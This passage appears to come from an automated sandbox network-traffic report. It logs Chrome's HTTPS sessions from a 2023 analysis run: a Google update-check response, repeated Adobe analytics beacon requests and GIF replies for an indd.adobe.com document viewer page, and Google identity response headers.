                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:16 UTC2INData Raw: 32 63 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 36 31 34 31 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 33 34 30 33 36 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22
                                                                                                                                                                                                                                                                                                              Data Ascii: 2c9<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="6141" elapsed_seconds="34036"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:16 UTC2INData Raw: 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69 7a 65 3d 22 32 34 38 35 33 31 22 20 73 74 61 74 75 73 3d 22 6f 6b 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 2e 30 2e 36 22 2f 3e 3c 2f 61 70 70 3e 3c 2f 67 75 70 64 61 74 65 3e 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app></gupdate>
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:16 UTC2INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              20192.168.2.164976563.140.38.180443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:22 UTC520OUTGET /b/ss/adbadobeinddprod/1/JS-1.4.2-D56H/s55507997216608?AQB=1&ndh=1&pf=1&t=25%2F9%2F2023%2018%3A27%3A21%203%20-120&D=D%3D&fid=31A41D21EBE6E61C-3B51C91A92692506&ce=UTF-8&cdp=2&fpCookieDomainPeriods=2&pageName=indd.adobe.com%3ADocViewer%3AFirstPageLoaded&g=https%3A%2F%2Findd.adobe.com%2Fview%2Fe174e561-569a-48e3-8548-c6c6e174aa25&ch=indd.adobe.com&c1=https%3A%2F%2Findd.adobe.com%2Fview%2Fe174e561-569a-48e3-8548-c6c6e174aa25&v1=D%3Dc1&c2=1&v2=D%3Dc2&c3=1&v3=D%3Dc3&v4=D%3Dc4&c5=792px&v5=D%3Dc5&c6=612px&v6=D%3Dc6&v7=D%3Dc7&v8=D%3Dc8&c9=Secured%20Message%20Dashboard&v9=D%3Dc9&c10=false&v10=D%3Dc10&c11=false&v11=D%3Dc11&v12=D%3Dc12&v13=D%3Dc13&c14=&v14=D%3Dc14&v15=D%3Dc15&v16=D%3Dc16&c17=true&v17=D%3Dc17&v41=D%3Dc41&s=1280x1024&c=24&j=1.6&v=N&k=Y&bw=1280&bh=907&AQE=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: sstats.adobe.com
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                              Referer: https://indd.adobe.com/
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: s_fid=31A41D21EBE6E61C-3B51C91A92692506; s_cc=true; s_vi=[CS]v1|329CA0F3A19B75CA-60000BAF437DAE53[CE]


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              2163.140.38.180443192.168.2.1649765C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:22 UTC522INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              access-control-allow-origin: *
                                                                                                                                                                                                                                                                                                              date: Wed, 25 Oct 2023 16:27:22 GMT
                                                                                                                                                                                                                                                                                                              expires: Tue, 24 Oct 2023 16:27:22 GMT
                                                                                                                                                                                                                                                                                                              last-modified: Thu, 26 Oct 2023 16:27:22 GMT
                                                                                                                                                                                                                                                                                                              pragma: no-cache
                                                                                                                                                                                                                                                                                                              p3p: CP="This is not a P3P policy"
                                                                                                                                                                                                                                                                                                              server: jag
                                                                                                                                                                                                                                                                                                              set-cookie: s_vi=[CS]v1|329CA0F3A19B75CA-60000BAF437DAE53[CE]; Path=/; Domain=adobe.com; Max-Age=63072000; Expires=Fri, 24 Oct 2025 16:27:27 GMT;
                                                                                                                                                                                                                                                                                                              etag: 3646966773286928384-4617523391173195235
                                                                                                                                                                                                                                                                                                              vary: *
                                                                                                                                                                                                                                                                                                              content-type: image/gif;charset=utf-8
                                                                                                                                                                                                                                                                                                              content-length: 43
                                                                                                                                                                                                                                                                                                              cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                                                                              strict-transport-security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                              cache-control: no-cache, no-store, max-age=0, no-transform, private
                                                                                                                                                                                                                                                                                                              x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:22 UTC523INData Raw: 47 49 46 38 39 61 02 00 02 00 80 00 00 ff ff ff 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 02 00 02 00 00 02 02 84 51 00 3b
                                                                                                                                                                                                                                                                                                              Data Ascii: GIF89a!,Q;


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              22192.168.2.164977163.140.38.180443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:23 UTC523OUTGET /b/ss/adbadobeinddprod/1/JS-1.4.2-D56H/s54551911915086?AQB=1&ndh=1&pf=1&t=25%2F9%2F2023%2018%3A27%3A21%203%20-120&D=D%3D&fid=31A41D21EBE6E61C-3B51C91A92692506&ce=UTF-8&cdp=2&fpCookieDomainPeriods=2&pageName=indd.adobe.com%3ADocViewer%3APageLoaded&g=https%3A%2F%2Findd.adobe.com%2Fview%2Fe174e561-569a-48e3-8548-c6c6e174aa25&ch=indd.adobe.com&c1=https%3A%2F%2Findd.adobe.com%2Fview%2Fe174e561-569a-48e3-8548-c6c6e174aa25&v1=D%3Dc1&c2=1&v2=D%3Dc2&c3=1&v3=D%3Dc3&v4=D%3Dc4&c5=792px&v5=D%3Dc5&c6=612px&v6=D%3Dc6&v7=D%3Dc7&v8=D%3Dc8&c9=Secured%20Message%20Dashboard&v9=D%3Dc9&c10=false&v10=D%3Dc10&c11=false&v11=D%3Dc11&v12=D%3Dc12&v13=D%3Dc13&c14=&v14=D%3Dc14&v15=D%3Dc15&v16=D%3Dc16&c17=true&v17=D%3Dc17&v41=D%3Dc41&s=1280x1024&c=24&j=1.6&v=N&k=Y&bw=1280&bh=907&AQE=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: sstats.adobe.com
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                              Referer: https://indd.adobe.com/
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: s_fid=31A41D21EBE6E61C-3B51C91A92692506; s_cc=true; s_vi=[CS]v1|329CA0F3A19B75CA-60000BAF437DAE53[CE]


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              23192.168.2.164977263.140.38.186443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:23 UTC524OUTGET /b/ss/adbadobeinddprod/1/JS-1.4.2-D56H/s55507997216608?AQB=1&ndh=1&pf=1&t=25%2F9%2F2023%2018%3A27%3A21%203%20-120&D=D%3D&fid=31A41D21EBE6E61C-3B51C91A92692506&ce=UTF-8&cdp=2&fpCookieDomainPeriods=2&pageName=indd.adobe.com%3ADocViewer%3AFirstPageLoaded&g=https%3A%2F%2Findd.adobe.com%2Fview%2Fe174e561-569a-48e3-8548-c6c6e174aa25&ch=indd.adobe.com&c1=https%3A%2F%2Findd.adobe.com%2Fview%2Fe174e561-569a-48e3-8548-c6c6e174aa25&v1=D%3Dc1&c2=1&v2=D%3Dc2&c3=1&v3=D%3Dc3&v4=D%3Dc4&c5=792px&v5=D%3Dc5&c6=612px&v6=D%3Dc6&v7=D%3Dc7&v8=D%3Dc8&c9=Secured%20Message%20Dashboard&v9=D%3Dc9&c10=false&v10=D%3Dc10&c11=false&v11=D%3Dc11&v12=D%3Dc12&v13=D%3Dc13&c14=&v14=D%3Dc14&v15=D%3Dc15&v16=D%3Dc16&c17=true&v17=D%3Dc17&v41=D%3Dc41&s=1280x1024&c=24&j=1.6&v=N&k=Y&bw=1280&bh=907&AQE=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: sstats.adobe.com
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: s_fid=31A41D21EBE6E61C-3B51C91A92692506; s_cc=true; s_vi=[CS]v1|329CA0F3A19B75CA-60000BAF437DAE53[CE]


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              2463.140.38.180443192.168.2.1649771C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:23 UTC525INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              access-control-allow-origin: *
                                                                                                                                                                                                                                                                                                              date: Wed, 25 Oct 2023 16:27:23 GMT
                                                                                                                                                                                                                                                                                                              expires: Tue, 24 Oct 2023 16:27:23 GMT
                                                                                                                                                                                                                                                                                                              last-modified: Thu, 26 Oct 2023 16:27:23 GMT
                                                                                                                                                                                                                                                                                                              pragma: no-cache
                                                                                                                                                                                                                                                                                                              p3p: CP="This is not a P3P policy"
                                                                                                                                                                                                                                                                                                              server: jag
                                                                                                                                                                                                                                                                                                              set-cookie: s_vi=[CS]v1|329CA0F3A19B75CA-60000BAF437DAE53[CE]; Path=/; Domain=adobe.com; Max-Age=63072000; Expires=Fri, 24 Oct 2025 16:27:27 GMT;
                                                                                                                                                                                                                                                                                                              etag: 3646966775876452352-4617706455021277729
                                                                                                                                                                                                                                                                                                              vary: *
                                                                                                                                                                                                                                                                                                              content-type: image/gif;charset=utf-8
                                                                                                                                                                                                                                                                                                              content-length: 43
                                                                                                                                                                                                                                                                                                              cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                                                                              strict-transport-security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                              cache-control: no-cache, no-store, max-age=0, no-transform, private
                                                                                                                                                                                                                                                                                                              x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:23 UTC526INData Raw: 47 49 46 38 39 61 02 00 02 00 80 00 00 ff ff ff 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 02 00 02 00 00 02 02 84 51 00 3b
                                                                                                                                                                                                                                                                                                              Data Ascii: GIF89a!,Q;


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              2563.140.38.186443192.168.2.1649772C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:23 UTC526INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              access-control-allow-origin: *
                                                                                                                                                                                                                                                                                                              date: Wed, 25 Oct 2023 16:27:23 GMT
                                                                                                                                                                                                                                                                                                              expires: Tue, 24 Oct 2023 16:27:23 GMT
                                                                                                                                                                                                                                                                                                              last-modified: Thu, 26 Oct 2023 16:27:23 GMT
                                                                                                                                                                                                                                                                                                              pragma: no-cache
                                                                                                                                                                                                                                                                                                              p3p: CP="This is not a P3P policy"
                                                                                                                                                                                                                                                                                                              server: jag
                                                                                                                                                                                                                                                                                                              set-cookie: s_vi=[CS]v1|329CA0F3A19B75CA-60000BAF437DAE53[CE]; Path=/; Domain=adobe.com; Max-Age=63072000; Expires=Fri, 24 Oct 2025 16:27:27 GMT;
                                                                                                                                                                                                                                                                                                              etag: 3646966774578348032-4617906967755119444
                                                                                                                                                                                                                                                                                                              vary: *
                                                                                                                                                                                                                                                                                                              content-type: image/gif;charset=utf-8
                                                                                                                                                                                                                                                                                                              content-length: 43
                                                                                                                                                                                                                                                                                                              cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                                                                              strict-transport-security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                              cache-control: no-cache, no-store, max-age=0, no-transform, private
                                                                                                                                                                                                                                                                                                              x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:23 UTC527INData Raw: 47 49 46 38 39 61 02 00 02 00 80 00 00 ff ff ff 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 02 00 02 00 00 02 02 84 51 00 3b
                                                                                                                                                                                                                                                                                                              Data Ascii: GIF89a!,Q;


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              26192.168.2.164977463.140.38.180443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:23 UTC527OUTGET /b/ss/adbadobeinddprod/1/JS-1.4.2-D56H/s52012643213516?AQB=1&ndh=1&pf=1&t=25%2F9%2F2023%2018%3A27%3A21%203%20-120&D=D%3D&fid=31A41D21EBE6E61C-3B51C91A92692506&ce=UTF-8&cdp=2&fpCookieDomainPeriods=2&pageName=indd.adobe.com%3ADocViewer%3AIFrameSrcURLs&g=https%3A%2F%2Findd.adobe.com%2Fview%2Fe174e561-569a-48e3-8548-c6c6e174aa25&ch=indd.adobe.com&c1=https%3A%2F%2Findd.adobe.com%2Fview%2Fe174e561-569a-48e3-8548-c6c6e174aa25&v1=D%3Dc1&c2=1&v2=D%3Dc2&c3=1&v3=D%3Dc3&v4=D%3Dc4&c5=792px&v5=D%3Dc5&c6=612px&v6=D%3Dc6&v7=D%3Dc7&v8=D%3Dc8&c9=Secured%20Message%20Dashboard&v9=D%3Dc9&c10=false&v10=D%3Dc10&c11=false&v11=D%3Dc11&v12=D%3Dc12&v13=D%3Dc13&c14=&v14=D%3Dc14&v15=D%3Dc15&v16=D%3Dc16&c17=true&v17=D%3Dc17&v41=D%3Dc41&s=1280x1024&c=24&j=1.6&v=N&k=Y&bw=1280&bh=907&AQE=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: sstats.adobe.com
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                              Referer: https://indd.adobe.com/
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: s_fid=31A41D21EBE6E61C-3B51C91A92692506; s_cc=true; s_vi=[CS]v1|329CA0F3A19B75CA-60000BAF437DAE53[CE]


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              27192.168.2.164977563.140.38.186443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:23 UTC528OUTGET /b/ss/adbadobeinddprod/1/JS-1.4.2-D56H/s54551911915086?AQB=1&ndh=1&pf=1&t=25%2F9%2F2023%2018%3A27%3A21%203%20-120&D=D%3D&fid=31A41D21EBE6E61C-3B51C91A92692506&ce=UTF-8&cdp=2&fpCookieDomainPeriods=2&pageName=indd.adobe.com%3ADocViewer%3APageLoaded&g=https%3A%2F%2Findd.adobe.com%2Fview%2Fe174e561-569a-48e3-8548-c6c6e174aa25&ch=indd.adobe.com&c1=https%3A%2F%2Findd.adobe.com%2Fview%2Fe174e561-569a-48e3-8548-c6c6e174aa25&v1=D%3Dc1&c2=1&v2=D%3Dc2&c3=1&v3=D%3Dc3&v4=D%3Dc4&c5=792px&v5=D%3Dc5&c6=612px&v6=D%3Dc6&v7=D%3Dc7&v8=D%3Dc8&c9=Secured%20Message%20Dashboard&v9=D%3Dc9&c10=false&v10=D%3Dc10&c11=false&v11=D%3Dc11&v12=D%3Dc12&v13=D%3Dc13&c14=&v14=D%3Dc14&v15=D%3Dc15&v16=D%3Dc16&c17=true&v17=D%3Dc17&v41=D%3Dc41&s=1280x1024&c=24&j=1.6&v=N&k=Y&bw=1280&bh=907&AQE=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: sstats.adobe.com
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: s_fid=31A41D21EBE6E61C-3B51C91A92692506; s_cc=true; s_vi=[CS]v1|329CA0F3A19B75CA-60000BAF437DAE53[CE]


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              2863.140.38.180443192.168.2.1649774C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:23 UTC529INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              access-control-allow-origin: *
                                                                                                                                                                                                                                                                                                              date: Wed, 25 Oct 2023 16:27:23 GMT
                                                                                                                                                                                                                                                                                                              expires: Tue, 24 Oct 2023 16:27:23 GMT
                                                                                                                                                                                                                                                                                                              last-modified: Thu, 26 Oct 2023 16:27:23 GMT
                                                                                                                                                                                                                                                                                                              pragma: no-cache
                                                                                                                                                                                                                                                                                                              p3p: CP="This is not a P3P policy"
                                                                                                                                                                                                                                                                                                              server: jag
                                                                                                                                                                                                                                                                                                              set-cookie: s_vi=[CS]v1|329CA0F3A19B75CA-60000BAF437DAE53[CE]; Path=/; Domain=adobe.com; Max-Age=63072000; Expires=Fri, 24 Oct 2025 16:27:27 GMT;
                                                                                                                                                                                                                                                                                                              etag: 3646966776627134464-4617857839247482613
                                                                                                                                                                                                                                                                                                              vary: *
                                                                                                                                                                                                                                                                                                              content-type: image/gif;charset=utf-8
                                                                                                                                                                                                                                                                                                              content-length: 43
                                                                                                                                                                                                                                                                                                              cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                                                                              strict-transport-security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                              cache-control: no-cache, no-store, max-age=0, no-transform, private
                                                                                                                                                                                                                                                                                                              x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:23 UTC530INData Raw: 47 49 46 38 39 61 02 00 02 00 80 00 00 ff ff ff 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 02 00 02 00 00 02 02 84 51 00 3b
                                                                                                                                                                                                                                                                                                              Data Ascii: GIF89a!,Q;


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              2963.140.38.186443192.168.2.1649775C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:23 UTC530INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              access-control-allow-origin: *
                                                                                                                                                                                                                                                                                                              date: Wed, 25 Oct 2023 16:27:23 GMT
                                                                                                                                                                                                                                                                                                              expires: Tue, 24 Oct 2023 16:27:23 GMT
                                                                                                                                                                                                                                                                                                              last-modified: Thu, 26 Oct 2023 16:27:23 GMT
                                                                                                                                                                                                                                                                                                              pragma: no-cache
                                                                                                                                                                                                                                                                                                              p3p: CP="This is not a P3P policy"
                                                                                                                                                                                                                                                                                                              server: jag
                                                                                                                                                                                                                                                                                                              set-cookie: s_vi=[CS]v1|329CA0F3A19B75CA-60000BAF437DAE53[CE]; Path=/; Domain=adobe.com; Max-Age=63072000; Expires=Fri, 24 Oct 2025 16:27:27 GMT;
                                                                                                                                                                                                                                                                                                              etag: 3646966775827431424-4617892036274110338
                                                                                                                                                                                                                                                                                                              vary: *
                                                                                                                                                                                                                                                                                                              content-type: image/gif;charset=utf-8
                                                                                                                                                                                                                                                                                                              content-length: 43
                                                                                                                                                                                                                                                                                                              cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                                                                              strict-transport-security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                              cache-control: no-cache, no-store, max-age=0, no-transform, private
                                                                                                                                                                                                                                                                                                              x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:23 UTC531INData Raw: 47 49 46 38 39 61 02 00 02 00 80 00 00 ff ff ff 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 02 00 02 00 00 02 02 84 51 00 3b
                                                                                                                                                                                                                                                                                                              Data Ascii: GIF89a!,Q;


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              3172.253.63.84443192.168.2.1649728C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:17 UTC2INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: https://www.google.com
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:27:16 GMT
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/IdentityListAccountsHttp/cspreport
                                                                                                                                                                                                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-wYiyw9HE_q0p4ZsvN2HViA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport/allowlist
                                                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
